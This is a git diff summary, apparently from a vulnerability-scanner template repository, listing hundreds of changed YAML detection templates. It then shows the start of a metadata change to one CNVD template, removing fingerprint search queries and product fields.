http/exposures/files/secrets-file.yaml | 11 +++++-----
http/exposures/files/sendgrid-env.yaml | 11 +++++-----
http/exposures/files/svn-wc-db.yaml | 11 +++++-----
.../files/symfony-properties-ini.yaml | 10 ++++-----
http/exposures/files/symfony-security.yaml | 10 ++++-----
http/exposures/files/token-info-json.yaml | 10 ++++-----
http/exposures/files/uwsgi-ini.yaml | 10 ++++-----
http/exposures/files/viminfo-disclosure.yaml | 10 ++++-----
http/exposures/files/vscode-sftp.yaml | 10 ++++-----
http/exposures/files/webpack-mix-js.yaml | 10 ++++-----
http/exposures/files/wp-cli-exposure.yaml | 10 ++++-----
http/exposures/files/ws-ftp-ini.yaml | 11 +++++-----
http/exposures/logs/fastcgi-echo.yaml | 10 ++++-----
http/exposures/logs/npm-debug-log.yaml | 11 +++++-----
http/exposures/logs/npm-log-file.yaml | 11 +++++-----
http/exposures/logs/opentsdb-status.yaml | 11 +++++-----
.../exposures/logs/redis-exception-error.yaml | 11 +++++-----
http/exposures/logs/ws-ftp-log.yaml | 11 +++++-----
http/exposures/logs/yii-error-page.yaml | 11 +++++-----
http/exposures/tokens/jwk-json-leak.yaml | 20 +++++++++--------
.../iot/grandstream-device-configuration.yaml | 17 +++++++-------
http/iot/honeywell-building-control.yaml | 17 +++++++-------
http/iot/hp-color-laserjet-detect.yaml | 11 +++++-----
http/iot/hue-personal-wireless-panel.yaml | 17 +++++++-------
http/iot/loytec-device.yaml | 11 +++++-----
http/iot/zebra-printer-detect.yaml | 11 +++++-----
.../exposed-file-upload-form.yaml | 11 +++++-----
http/miscellaneous/microsoft-azure-error.yaml | 17 +++++++-------
.../netflix-conductor-version.yaml | 17 +++++++-------
http/misconfiguration/aem/aem-acs-common.yaml | 11 +++++-----
http/misconfiguration/aem/aem-bg-servlet.yaml | 16 +++++++-------
http/misconfiguration/aem/aem-bulkeditor.yaml | 10 ++++-----
.../aem/aem-cached-pages.yaml | 17 +++++++-------
http/misconfiguration/aem/aem-crx-bypass.yaml | 16 +++++++-------
.../aem/aem-crx-namespace.yaml | 11 +++++-----
http/misconfiguration/aem/aem-crx-search.yaml | 10 ++++-----
.../aem/aem-custom-script.yaml | 10 ++++-----
.../aem/aem-debugging-libraries.yaml | 10 ++++-----
.../aem/aem-default-get-servlet.yaml | 19 ++++++++--------
http/misconfiguration/aem/aem-disk-usage.yaml | 11 +++++-----
.../aem/aem-dump-contentnode.yaml | 11 +++++-----
.../aem/aem-explorer-nodetypes.yaml | 11 +++++-----
.../aem/aem-external-link-checker.yaml | 10 ++++-----
.../misconfiguration/aem/aem-gql-servlet.yaml | 19 ++++++++--------
.../aem/aem-groovyconsole.yaml | 16 +++++++-------
.../aem/aem-hash-querybuilder.yaml | 17 +++++++-------
.../aem/aem-login-status.yaml | 16 +++++++-------
.../aem/aem-merge-metadata-servlet.yaml | 16 +++++++-------
.../aem/aem-offloading-browser.yaml | 11 +++++-----
.../aem/aem-osgi-bundles.yaml | 11 +++++-----
.../aem-querybuilder-internal-path-read.yaml | 17 +++++++-------
.../aem/aem-querybuilder-json-servlet.yaml | 16 +++++++-------
.../aem/aem-sling-userinfo.yaml | 10 ++++-----
.../aem/aem-userinfo-servlet.yaml | 17 +++++++-------
.../airflow/airflow-debug.yaml | 11 +++++-----
.../airflow/unauthenticated-airflow.yaml | 17 +++++++-------
.../ampache-update-exposure.yaml | 11 +++++-----
.../apache-drill-exposure.yaml | 11 +++++-----
.../misconfiguration/apache-druid-unauth.yaml | 11 +++++-----
http/misconfiguration/apache-impala.yaml | 11 +++++-----
.../apache-struts-showcase.yaml | 11 +++++-----
.../misconfiguration/apple-cups-exposure.yaml | 11 +++++-----
.../atlassian-bamboo-build.yaml | 10 ++++-----
.../bitbucket-auth-bypass.yaml | 10 ++++-----
.../bitbucket-public-repository.yaml | 11 +++++-----
.../browserless-debugger.yaml | 16 +++++++-------
.../casdoor-users-password.yaml | 11 +++++-----
http/misconfiguration/chatgpt-web-unauth.yaml | 11 +++++-----
.../clickhouse-unauth-api.yaml | 11 +++++-----
.../codeigniter-errorpage.yaml | 11 +++++-----
http/misconfiguration/codemeter-webadmin.yaml | 11 +++++-----
.../confluence/confluence-oauth-admin.yaml | 10 ++++-----
.../misconfiguration/debug/ampache-debug.yaml | 10 ++++-----
http/misconfiguration/debug/bottle-debug.yaml | 10 ++++-----
.../debug/flask-werkzeug-debug.yaml | 11 +++++-----
http/misconfiguration/debug/github-debug.yaml | 10 ++++-----
.../dlink-unauth-cgi-script.yaml | 11 +++++-----
.../docmosis-tornado-server.yaml | 11 +++++-----
.../drupal/drupal-user-enum-redirect.yaml | 10 ++++-----
http/misconfiguration/elasticsearch.yaml | 11 +++++-----
.../envoy-admin-exposure.yaml | 11 +++++-----
http/misconfiguration/esphome-dashboard.yaml | 10 ++++-----
http/misconfiguration/everything-listing.yaml | 10 ++++-----
.../misconfiguration/feiyuxing-info-leak.yaml | 10 ++++-----
http/misconfiguration/freshrss-unauth.yaml | 19 ++++++++--------
.../fusionauth-admin-setup.yaml | 11 +++++-----
.../ganglia-cluster-dashboard.yaml | 10 ++++-----
http/misconfiguration/git-web-interface.yaml | 17 +++++++-------
.../misconfiguration/gitea-public-signup.yaml | 11 +++++-----
.../gitlab/gitlab-public-repos.yaml | 16 +++++++-------
.../gitlab/gitlab-public-signup.yaml | 18 ++++++++-------
http/misconfiguration/gitlist-disclosure.yaml | 17 +++++++-------
.../global-traffic-statistics.yaml | 11 +++++-----
.../gocd/gocd-cruise-configuration.yaml | 17 +++++++-------
.../gocd/gocd-encryption-key.yaml | 17 +++++++-------
.../gocd/gocd-unauth-dashboard.yaml | 17 +++++++-------
.../grafana-public-signup.yaml | 17 +++++++-------
.../graphql/graphql-playground.yaml | 10 ++++-----
.../misconfiguration/grav-register-admin.yaml | 11 +++++-----
http/misconfiguration/h2o/h2o-dashboard.yaml | 12 +++++-----
.../haproxy-exporter-metrics.yaml | 11 +++++-----
.../helm-dashboard-exposure.yaml | 11 +++++-----
http/misconfiguration/hfs-exposure.yaml | 10 ++++-----
.../hp/unauthorized-printer-hp.yaml | 17 +++++++-------
.../ibm-friendly-path-exposure.yaml | 17 +++++++-------
.../installer/activecollab-installer.yaml | 11 +++++-----
.../installer/adguard-installer.yaml | 19 ++++++++--------
.../installer/alma-installer.yaml | 11 +++++-----
.../installer/ampache-music-installer.yaml | 11 +++++-----
.../atlassian-bamboo-setup-wizard.yaml | 11 +++++-----
.../installer/bagisto-installer.yaml | 11 +++++-----
.../installer/bitrix24-installer.yaml | 11 +++++-----
.../installer/call-com-installer.yaml | 11 +++++-----
.../installer/chamilo-installer.yaml | 12 +++++-----
.../installer/clipbucket-installer.yaml | 11 +++++-----
.../installer/cloudcenter-Installer.yaml | 11 +++++-----
.../installer/codeigniter-installer.yaml | 11 +++++-----
.../installer/combodo-itop-installer.yaml | 11 +++++-----
.../installer/concrete-installer.yaml | 11 +++++-----
.../installer/connectwise-setup.yaml | 11 +++++-----
.../installer/custom-xoops-installer.yaml | 11 +++++-----
.../installer/discourse-installer.yaml | 11 +++++-----
.../installer/dokuwiki-installer.yaml | 11 +++++-----
.../installer/dolibarr-installer.yaml | 11 +++++-----
.../installer/dolphin-installer.yaml | 11 +++++-----
.../installer/ejbca-enterprise-installer.yaml | 11 +++++-----
.../installer/elgg-install.yaml | 19 ++++++++--------
.../installer/eshop-installer.yaml | 11 +++++-----
.../installer/espocrm-installer.yaml | 11 +++++-----
.../installer/facturascripts-installer.yaml | 11 +++++-----
.../installer/flarum-installer.yaml | 11 +++++-----
.../installer/fossbilling-installer.yaml | 11 +++++-----
.../installer/freshrss-installer.yaml | 19 ++++++++--------
.../installer/froxlor-installer.yaml | 11 +++++-----
.../installer/gitea-installer.yaml | 11 +++++-----
.../installer/glpi-installer.yaml | 11 +++++-----
.../installer/growi-installer.yaml | 11 +++++-----
.../installer/impresspages-installer.yaml | 11 +++++-----
.../installer/jira-setup.yaml | 11 +++++-----
.../installer/joomla-installer.yaml | 11 +++++-----
.../installer/knowledgetree-installer.yaml | 11 +++++-----
.../installer/kodbox-installer.yaml | 11 +++++-----
.../installer/librenms-installer.yaml | 11 +++++-----
.../installer/limesurvey-installer.yaml | 5 ++---
.../installer/lychee-installer.yaml | 11 +++++-----
.../installer/magento-installer.yaml | 11 +++++-----
.../installer/magnolia-installer.yaml | 11 +++++-----
.../installer/mantisbt-installer.yaml | 11 +++++-----
.../installer/matomo-installer.yaml | 11 +++++-----
.../installer/mautic-installer.yaml | 11 +++++-----
.../installer/monstra-installer.yaml | 11 +++++-----
.../installer/moodle-installer.yaml | 11 +++++-----
.../installer/moosocial-installer.yaml | 11 +++++-----
.../installer/mosparo-install.yaml | 11 +++++-----
.../installer/mura-cms-setup-installer.yaml | 11 +++++-----
.../installer/nagiosxi-installer.yaml | 11 +++++-----
.../installer/nodebb-installer.yaml | 11 +++++-----
.../installer/octoprint-installer.yaml | 11 +++++-----
.../installer/ojs-installer.yaml | 11 +++++-----
.../installer/onlyoffice-installer.yaml | 11 +++++-----
.../installer/openemr-setup-installer.yaml | 11 +++++-----
.../installer/openfire-setup.yaml | 11 +++++-----
.../installer/openmage-install.yaml | 11 +++++-----
.../installer/opensis-installer.yaml | 11 +++++-----
.../installer/orangehrm-installer.yaml | 11 +++++-----
.../installer/orangescrum-install.yaml | 11 +++++-----
.../installer/orchard-installer.yaml | 11 +++++-----
.../owncloud-installer-exposure.yaml | 11 +++++-----
.../installer/oxid-eshop-installer.yaml | 11 +++++-----
.../installer/pagekit-installer.yaml | 11 +++++-----
.../installer/pandora-fms-installer.yaml | 11 +++++-----
.../installer/permissions-installer.yaml | 11 +++++-----
.../installer/phpbb-installer.yaml | 11 +++++-----
.../installer/phpgedview-installer.yaml | 11 +++++-----
.../installer/phpipam-installer.yaml | 11 +++++-----
.../installer/phpmyfaq-installer.yaml | 11 +++++-----
.../installer/phpwind-installer.yaml | 11 +++++-----
.../installer/piwigo-installer.yaml | 11 +++++-----
.../installer/pmm-installer.yaml | 11 +++++-----
.../installer/poste-io-installer.yaml | 11 +++++-----
.../installer/prestashop-installer.yaml | 11 +++++-----
.../installer/processwire-installer.yaml | 11 +++++-----
.../installer/projectsend-installer.yaml | 12 +++++-----
.../installer/qloapps-installer.yaml | 12 +++++-----
.../installer/redash-installer.yaml | 11 +++++-----
.../installer/sabnzbd-installer.yaml | 12 +++++-----
.../installer/server-monitor-installer.yaml | 11 +++++-----
.../installer/setup-github-enterprise.yaml | 11 +++++-----
.../installer/shopware-installer.yaml | 11 +++++-----
.../installer/smf-installer.yaml | 11 +++++-----
.../installer/snipe-it-installer.yaml | 11 +++++-----
.../installer/spa-cart-installer.yaml | 16 +++++++-------
.../installer/subrion-installer.yaml | 11 +++++-----
.../installer/sugarcrm-install.yaml | 11 +++++-----
.../installer/suitecrm-installer.yaml | 11 +++++-----
.../installer/tasmota-install.yaml | 11 +++++-----
.../installer/tastyigniter-installer.yaml | 11 +++++-----
.../installer/tautulli-install.yaml | 11 +++++-----
.../installer/testrail-install.yaml | 11 +++++-----
.../installer/tiny-rss-installer.yaml | 11 +++++-----
.../installer/typo3-installer.yaml | 11 +++++-----
.../installer/umbraco-installer.yaml | 11 +++++-----
.../installer/uvdesk-install.yaml | 11 +++++-----
.../installer/vtiger-installer.yaml | 11 +++++-----
.../installer/webcalendar-install.yaml | 11 +++++-----
.../installer/webtrees-install.yaml | 11 +++++-----
.../installer/webuzo-installer.yaml | 11 +++++-----
.../installer/wiki-js-installer.yaml | 11 +++++-----
.../installer/wowonder-installer.yaml | 11 +++++-----
.../installer/yzmcms-installer.yaml | 11 +++++-----
.../installer/zencart-installer.yaml | 11 +++++-----
.../misconfiguration/jaeger-ui-dashboard.yaml | 19 ++++++++--------
.../jenkins/jenkins-openuser-register.yaml | 10 ++++-----
.../jetty-showcontexts-enable.yaml | 11 +++++-----
.../jupyter-notebooks-exposed.yaml | 17 +++++++-------
.../kubernetes/kube-state-metrics.yaml | 10 ++++-----
.../misconfiguration/label-studio-signup.yaml | 11 +++++-----
.../libvirt-exporter-metrics.yaml | 11 +++++-----
.../misconfiguration/liferay/liferay-api.yaml | 10 ++++-----
.../liferay/liferay-axis.yaml | 10 ++++-----
.../liferay/liferay-jsonws.yaml | 11 +++++-----
http/misconfiguration/locust-exposure.yaml | 11 +++++-----
.../manage-engine-ad-search.yaml | 10 ++++-----
http/misconfiguration/mongod-exposure.yaml | 11 +++++-----
.../ms-exchange-user-enum.yaml | 11 +++++-----
.../multilaser-pro-setup.yaml | 10 ++++-----
http/misconfiguration/mysql-history.yaml | 10 ++++-----
.../nacos/nacos-create-user.yaml | 11 +++++-----
http/misconfiguration/ntop-panel-exposed.yaml | 10 ++++-----
.../odoo-unprotected-database.yaml | 10 ++++-----
http/misconfiguration/openstack-config.yaml | 16 +++++++-------
.../oracle-reports-services.yaml | 10 ++++-----
http/misconfiguration/pcdn-cache-node.yaml | 11 +++++-----
http/misconfiguration/perfsonar-toolkit.yaml | 11 +++++-----
http/misconfiguration/php-errors.yaml | 16 +++++++-------
http/misconfiguration/phpcli-stack-trace.yaml | 10 ++++-----
http/misconfiguration/python-metrics.yaml | 16 +++++++-------
.../rabbitmq-exporter-metrics.yaml | 11 +++++-----
http/misconfiguration/ray-dashboard.yaml | 11 +++++-----
.../request-baskets-exposure.yaml | 11 +++++-----
http/misconfiguration/selenium-exposure.yaml | 11 +++++-----
.../sentinel-license-monitor.yaml | 11 +++++-----
.../servicenow-widget-misconfig.yaml | 10 ++++-----
http/misconfiguration/sftpgo-admin-setup.yaml | 19 ++++++++--------
http/misconfiguration/smarterstats-setup.yaml | 11 +++++-----
http/misconfiguration/smokeping-grapher.yaml | 11 +++++-----
.../solr-query-dashboard.yaml | 14 ++++++------
.../sonarqube-projects-disclosure.yaml | 10 ++++-----
.../sql-server-report-viewer.yaml | 11 +++++-----
.../misconfiguration/struts-ognl-console.yaml | 10 ++++-----
http/misconfiguration/symfony-debug.yaml | 12 +++++-----
http/misconfiguration/symfony-fragment.yaml | 10 ++++-----
.../misconfiguration/syncthing-dashboard.yaml | 11 +++++-----
.../tasmota-config-webui.yaml | 11 +++++-----
.../teslamate-unauth-access.yaml | 10 ++++-----
http/misconfiguration/thinkphp-errors.yaml | 11 +++++-----
http/misconfiguration/tomcat-stacktraces.yaml | 11 +++++-----
http/misconfiguration/typo3-composer.yaml | 10 ++++-----
http/misconfiguration/typo3-debug-mode.yaml | 11 +++++-----
.../unauth-apache-kafka-ui.yaml | 10 ++++-----
.../unauth-celery-flower.yaml | 17 +++++++-------
http/misconfiguration/unauth-etherpad.yaml | 10 ++++-----
.../unauth-ldap-account-manager.yaml | 11 +++++-----
http/misconfiguration/unauth-mercurial.yaml | 11 +++++-----
.../unauthenticated-alert-manager.yaml | 16 +++++++-------
.../unauthenticated-mongo-express.yaml | 10 ++++-----
.../unauthorized-h3csecparh-login.yaml | 10 ++++-----
.../untangle-admin-setup.yaml | 11 +++++-----
http/technologies/4D-detect.yaml | 12 +++++-----
http/technologies/activecollab-detect.yaml | 16 +++++++-------
.../adobe/adobe-coldfusion-detect.yaml | 10 ++++-----
.../adobe/adobe-coldfusion-error-detect.yaml | 10 ++++-----
http/technologies/aem-detect.yaml | 16 +++++++-------
http/technologies/aerocms-detect.yaml | 10 ++++-----
http/technologies/angular-detect.yaml | 10 ++++-----
http/technologies/apache/airflow-detect.yaml | 11 +++++-----
.../apache/apache-answer-detect.yaml | 11 +++++-----
.../apache/apache-axis-detect.yaml | 10 ++++-----
.../apache/apache-cloudstack-detect.yaml | 16 ++++++++------
.../apache/apache-cocoon-detect.yaml | 10 ++++-----
.../apache/apache-dubbo-detect.yaml | 16 +++++++-------
.../apache/apache-karaf-panel.yaml | 10 ++++-----
.../apache/apache-ofbiz-detect.yaml | 19 ++++++++--------
.../apache/apache-streampipes-detect.yaml | 22 +++++++++----------
.../apache/apache-tapestry-detect.yaml | 16 +++++++-------
.../apache/apache-zeppelin-detect.yaml | 16 +++++++-------
.../apache/default-apache-test-all.yaml | 16 +++++++-------
.../apache/default-apache-test-page.yaml | 16 +++++++-------
.../apache/default-apache2-page.yaml | 16 +++++++-------
.../technologies/apache/ranger-detection.yaml | 16 +++++++-------
.../apache/xampp-default-page.yaml | 16 +++++++-------
http/technologies/appcms-detect.yaml | 16 +++++++-------
http/technologies/autobahn-python-detect.yaml | 16 +++++++-------
http/technologies/avideo-detect.yaml | 10 ++++-----
http/technologies/b2b-builder-detect.yaml | 16 +++++++-------
http/technologies/bamboo-detect.yaml | 9 ++++----
http/technologies/bigbluebutton-detect.yaml | 16 +++++++-------
http/technologies/bigip-apm-detect.yaml | 11 +++++-----
http/technologies/casaos-detection.yaml | 18 +++++++--------
.../checkpoint-mobile-detect.yaml | 10 ++++-----
http/technologies/chevereto-detect.yaml | 16 +++++++-------
http/technologies/citrix-hypervisor-page.yaml | 10 ++++-----
.../citrix-xenmobile-version.yaml | 12 +++++-----
.../connectwise-control-detect.yaml | 10 ++++-----
http/technologies/couchbase-sync-gateway.yaml | 16 +++++++-------
http/technologies/craftercms-detect.yaml | 11 +++++-----
http/technologies/cvsweb-detect.yaml | 10 ++++-----
http/technologies/dash-panel-detect.yaml | 10 ++++-----
http/technologies/dedecms-detect.yaml | 10 ++++-----
http/technologies/default-apache-shiro.yaml | 10 ++++-----
http/technologies/default-cakephp-page.yaml | 10 ++++-----
.../default-codeigniter-page.yaml | 16 +++++++-------
http/technologies/default-django-page.yaml | 16 +++++++-------
http/technologies/default-fastcgi-page.yaml | 16 +++++++-------
http/technologies/default-fedora-page.yaml | 16 +++++++-------
.../default-glassfish-server-page.yaml | 17 +++++++-------
http/technologies/default-jetty-page.yaml | 16 +++++++-------
http/technologies/default-lighttpd-page.yaml | 16 +++++++-------
.../default-lighttpd-placeholder-page.yaml | 16 +++++++-------
http/technologies/default-movable-page.yaml | 4 ++--
http/technologies/default-openresty.yaml | 16 +++++++-------
.../technologies/default-parallels-plesk.yaml | 10 ++++-----
.../default-payara-server-page.yaml | 16 +++++++-------
http/technologies/default-plesk-page.yaml | 16 +++++++-------
.../default-redhat-test-page.yaml | 16 +++++++-------
http/technologies/default-sitecore-page.yaml | 10 ++++-----
.../default-ssltls-test-page.yaml | 16 +++++++-------
http/technologies/default-symfony-page.yaml | 10 ++++-----
http/technologies/default-tengine-page.yaml | 10 ++++-----
.../default-websphere-liberty.yaml | 10 ++++-----
http/technologies/devexpress-detect.yaml | 17 +++++++-------
http/technologies/directus-detect.yaml | 11 +++++-----
http/technologies/drupal-detect.yaml | 10 ++++-----
.../elasticsearch-sql-client-detect.yaml | 16 +++++++-------
http/technologies/element-web-detect.yaml | 11 +++++-----
http/technologies/empirecms-detect.yaml | 16 +++++++-------
http/technologies/gitbook-detect.yaml | 10 ++++-----
http/technologies/glpi-status-page.yaml | 10 ++++-----
http/technologies/goliath-detect.yaml | 10 ++++-----
.../google/chromecast-detect.yaml | 11 +++++-----
.../graylog/graylog-api-exposure.yaml | 11 +++++-----
http/technologies/hugo-detect.yaml | 10 ++++-----
http/technologies/ibm/ibm-http-server.yaml | 16 +++++++-------
http/technologies/ibm/ibm-odm-detect.yaml | 11 +++++-----
http/technologies/icecast-server-detect.yaml | 10 ++++-----
.../identity-server-v3-detect.yaml | 12 +++++-----
http/technologies/imgproxy-detect.yaml | 11 +++++-----
http/technologies/interactsh-server.yaml | 10 ++++-----
http/technologies/ispyconnect-detect.yaml | 10 ++++-----
http/technologies/jeecg-boot-detect.yaml | 16 +++++++-------
http/technologies/jellyfin-detect.yaml | 10 ++++-----
http/technologies/jhipster-detect.yaml | 10 ++++-----
http/technologies/jitsi-meet-detect.yaml | 16 +++++++-------
http/technologies/joomla-detect.yaml | 10 ++++-----
http/technologies/kodexplorer-detect.yaml | 16 +++++++-------
http/technologies/landesk/landesk-ma.yaml | 10 ++++-----
http/technologies/limesurvey-detect.yaml | 10 ++++-----
http/technologies/livehelperchat-detect.yaml | 10 ++++-----
http/technologies/magento-detect.yaml | 10 ++++-----
http/technologies/magmi-detect.yaml | 10 ++++-----
.../matrix-homeserver-detect.yaml | 12 +++++-----
http/technologies/microsoft-iis-8.yaml | 16 +++++++-------
.../microsoft/default-iis7-page.yaml | 16 +++++++-------
.../default-microsoft-azure-page.yaml | 16 +++++++-------
.../default-windows-server-page.yaml | 16 +++++++-------
http/technologies/mikrotik-httpproxy.yaml | 10 ++++-----
http/technologies/mongoose-server.yaml | 10 ++++-----
http/technologies/moveit-transfer-detect.yaml | 10 ++++-----
http/technologies/nextcloud-detect.yaml | 10 ++++-----
.../nextcloud-owncloud-detect.yaml | 11 +++++-----
http/technologies/nexus-detect.yaml | 10 ++++-----
http/technologies/notion-detect.yaml | 10 ++++-----
http/technologies/open-journal-systems.yaml | 10 ++++-----
http/technologies/openhap-detect.yaml | 10 ++++-----
http/technologies/openproject-detect.yaml | 10 ++++-----
http/technologies/openssl-detect.yaml | 10 ++++-----
http/technologies/oracle/oracle-dbcs.yaml | 16 +++++++-------
.../oracle/oracle-iplanet-web-server.yaml | 16 +++++++-------
.../oracle/oracle-webcenter-sites.yaml | 10 ++++-----
.../payara-micro-server-detect.yaml | 10 ++++-----
http/technologies/pbootcms-detect.yaml | 10 ++++-----
http/technologies/pexip-detect.yaml | 11 +++++-----
http/technologies/php-detect.yaml | 10 ++++-----
http/technologies/php-fusion-detect.yaml | 16 +++++++-------
http/technologies/phplist-detect.yaml | 10 ++++-----
http/technologies/pi-hole-detect.yaml | 10 ++++-----
http/technologies/prestashop-detect.yaml | 16 +++++++-------
http/technologies/privatebin-detect.yaml | 12 +++++-----
http/technologies/pypiserver-detect.yaml | 10 ++++-----
.../roundcube-webmail-portal.yaml | 16 +++++++-------
http/technologies/rseenet-detect.yaml | 4 ++--
http/technologies/rsshub-detect.yaml | 10 ++++-----
http/technologies/samsung-smarttv-debug.yaml | 10 ++++-----
.../sharefile-storage-server.yaml | 10 ++++-----
http/technologies/shopware-detect.yaml | 10 ++++-----
http/technologies/simplesamlphp-detect.yaml | 12 +++++-----
http/technologies/sitecore-cms.yaml | 10 ++++-----
http/technologies/smartstore-detect.yaml | 16 +++++++-------
http/technologies/sogo-detect.yaml | 10 ++++-----
http/technologies/statamic-detect.yaml | 11 +++++-----
http/technologies/subrion-cms-detect.yaml | 18 +++++++--------
.../tibco-businessconnect-detect.yaml | 11 +++++-----
.../tibco-spotfire-services-detect.yaml | 11 +++++-----
http/technologies/tinyproxy-detect.yaml | 11 +++++-----
http/technologies/typo3-detect.yaml | 16 +++++++-------
http/technologies/utility-service-detect.yaml | 10 ++++-----
http/technologies/vbulletin-detect.yaml | 10 ++++-----
.../versa/versa-analytics-server.yaml | 10 ++++-----
.../versa/versa-director-api.yaml | 10 ++++-----
.../versa/versa-networks-detect.yaml | 10 ++++-----
.../vivotex-web-console-detect.yaml | 18 +++++++--------
.../vmware/vmware-horizon-version.yaml | 10 ++++-----
.../technologies/wing-ftp-service-detect.yaml | 11 +++++-----
http/technologies/wms-server-detect.yaml | 10 ++++-----
.../themes/wp-bricks-builder-theme.yaml | 11 +++++-----
http/technologies/xenforo-detect.yaml | 16 +++++++-------
.../technologies/xerox-workcentre-detect.yaml | 10 ++++-----
http/technologies/yapi-detect.yaml | 16 +++++++-------
http/technologies/yourls-detect.yaml | 11 +++++-----
http/technologies/zend-server-test-page.yaml | 10 ++++-----
.../apache/apache-nifi-rce.yaml | 4 ++--
.../citrix/citrix-oob-memory-read.yaml | 12 +++++-----
.../dedecms-carbuyaction-fileinclude.yaml | 10 ++++-----
http/vulnerabilities/dedecms/dedecms-rce.yaml | 4 ++--
.../discuz/discuz-api-pathinfo.yaml | 10 ++++-----
.../ecstatic/node-ecstatic-listing.yaml | 5 +++--
.../esafenet-netsecconfigajax-sqli.yaml | 19 ++++++++--------
http/vulnerabilities/gitea/gitea-rce.yaml | 10 ++++-----
.../jira-unauthenticated-adminprojects.yaml | 16 +++++++-------
.../jira/jira-unauthenticated-dashboards.yaml | 16 +++++++-------
.../jira/jira-unauthenticated-screens.yaml | 16 +++++++-------
.../jira-unauthenticated-user-picker.yaml | 16 +++++++-------
http/vulnerabilities/juniper/junos-xss.yaml | 14 ++++++------
.../vulnerabilities/jupyter-notebook-rce.yaml | 10 ++++-----
.../landray/landray-eis-sqli.yaml | 11 +++++-----
.../landray/landray-oa-replaceextend-rce.yaml | 13 +++++------
.../landray/landray-oa-treexml-rce.yaml | 10 ++++-----
.../magento/magento-2-exposed-api.yaml | 16 +++++++-------
.../magento/magento-cacheleak.yaml | 10 ++++-----
.../magento-unprotected-dev-files.yaml | 10 ++++-----
.../nuxt/nuxt-js-semi-lfi.yaml | 11 +++++-----
.../vulnerabilities/other/acti-video-lfi.yaml | 10 ++++-----
http/vulnerabilities/other/bagisto-csti.yaml | 17 +++++++-------
.../other/beyond-trust-xss.yaml | 10 ++++-----
.../other/cmseasy-crossall-act-sqli.yaml | 10 ++++-----
.../other/dixell-xweb500-filewrite.yaml | 17 +++++++-------
.../other/doorgets-info-disclosure.yaml | 11 +++++-----
.../other/ecology-oa-file-sqli.yaml | 10 ++++-----
http/vulnerabilities/other/fastadmin-lfi.yaml | 11 +++++-----
.../other/kingsoft-vgm-lfi.yaml | 10 ++++-----
.../other/kiwitcms-json-rpc.yaml | 17 +++++++-------
.../other/landray-oa-datajson-rce.yaml | 10 ++++-----
.../other/nacos-auth-bypass.yaml | 10 ++++-----
http/vulnerabilities/other/ncast-lfi.yaml | 19 ++++++++--------
.../other/phpldapadmin-xss.yaml | 11 +++++-----
.../vulnerabilities/other/quick-cms-sqli.yaml | 12 +++++-----
.../other/sharp-printers-lfi.yaml | 11 +++++-----
http/vulnerabilities/other/slims-xss.yaml | 10 ++++-----
.../other/tekon-info-leak.yaml | 16 +++++++-------
.../other/tendat-credential.yaml | 11 +++++-----
.../other/ups-network-lfi.yaml | 11 +++++-----
.../other/webpagetest-ssrf.yaml | 11 +++++-----
.../other/xxljob-executor-unauth.yaml | 10 ++++-----
http/vulnerabilities/phpmyadmin-unauth.yaml | 10 ++++-----
.../ruijie/ruijie-password-leak.yaml | 10 ++++-----
.../sangfor/sangfor-ngaf-lfi.yaml | 10 ++++-----
.../sitecore/sitecore-xml-xss.yaml | 10 ++++-----
.../thinkphp6-arbitrary-write.yaml | 13 +++++------
.../tongda/tongda-action-uploadfile.yaml | 12 +++++-----
.../tongda/tongda-auth-bypass.yaml | 11 +++++-----
.../tongda/tongda-insert-sqli.yaml | 10 ++++-----
.../tongda/tongda-meeting-unauth.yaml | 10 ++++-----
.../tongda/tongda-report-func-sqli.yaml | 10 ++++-----
.../tongda/tongda-video-file-read.yaml | 4 ++--
.../tongda/tongdaoa-auth-bypass.yaml | 12 +++++-----
.../vulnerabilities/ueditor/ueditor-ssrf.yaml | 10 ++++-----
.../vbulletin/vbulletin-search-sqli.yaml | 11 +++++-----
.../vmware/vmware-cloud-xss.yaml | 11 +++++-----
.../ecology-jqueryfiletree-traversal.yaml | 10 ++++-----
.../ecology-verifyquicklogin-auth-bypass.yaml | 16 +++++++-------
.../weaver/weaver-checkserver-sqli.yaml | 10 ++++-----
.../weaver/weaver-ecology-bshservlet-rce.yaml | 11 +++++-----
.../weaver/weaver-group-xml-sqli.yaml | 12 +++++-----
.../weaver/weaver-mysql-config-info-leak.yaml | 10 ++++-----
.../weaver/weaver-officeserver-lfi.yaml | 10 ++++-----
.../weaver/weaver-signaturedownload-lfi.yaml | 10 ++++-----
.../weaver-sptmforportalthumbnail-lfi.yaml | 10 ++++-----
.../weaver/weaver-uploadify-file-upload.yaml | 12 +++++-----
.../weaver/weaver-userselect-unauth.yaml | 10 ++++-----
.../wechat/wechat-info-leak.yaml | 10 ++++-----
.../wordpress/booked-export-csv.yaml | 10 ++++-----
.../wordpress/photo-gallery-xss.yaml | 11 +++++-----
.../photoblocks-grid-gallery-xss.yaml | 10 ++++-----
.../wordpress/wordpress-ssrf-oembed.yaml | 17 +++++++-------
.../wordpress/wp-mstore-plugin-listing.yaml | 16 +++++++-------
.../wordpress/wp-social-warfare-rce.yaml | 10 ++++-----
.../wordpress/wp-statistics-sqli.yaml | 12 +++++-----
.../wp-superstorefinder-misconfig.yaml | 10 ++++-----
http/vulnerabilities/wordpress/wp-sym404.yaml | 10 ++++-----
.../wordpress/wp-touch-redirect.yaml | 10 ++++-----
.../wordpress/wp-yoast-user-enumeration.yaml | 11 +++++-----
.../yonyou/yonyou-nc-accept-fileupload.yaml | 10 ++++-----
.../yonyou-nc-baseapp-deserialization.yaml | 10 ++++-----
.../yonyou-nc-dispatcher-fileupload.yaml | 10 ++++-----
.../yonyou/yonyou-nc-info-leak.yaml | 10 ++++-----
.../yonyou-nc-ncmessageservlet-rce.yaml | 10 ++++-----
.../yonyou/yonyou-ufida-nc-lfi.yaml | 11 +++++-----
http/vulnerabilities/zend/zend-v1-xss.yaml | 10 ++++-----
.../zyxel/unauth-ztp-ping.yaml | 10 ++++-----
.../zzzcms/zzzcms-info-disclosure.yaml | 10 ++++-----
http/vulnerabilities/zzzcms/zzzcms-xss.yaml | 4 ++--
668 files changed, 4127 insertions(+), 3767 deletions(-)
diff --git a/http/cnvd/2020/CNVD-2020-63964.yaml b/http/cnvd/2020/CNVD-2020-63964.yaml
index f9328bd413..204a57b60d 100644
--- a/http/cnvd/2020/CNVD-2020-63964.yaml
+++ b/http/cnvd/2020/CNVD-2020-63964.yaml
@@ -8,16 +8,16 @@ info:
jshERP that can reveal sensitive information including system credentials without credentials.
reference:
- https://cn-sec.com/archives/1798444.html
- metadata:
- max-request: 1
- shodan-query: http.favicon.hash:-1298131932
- fofa-query: jshERP-boot
- product: jsherp
- vendor: jishenghua
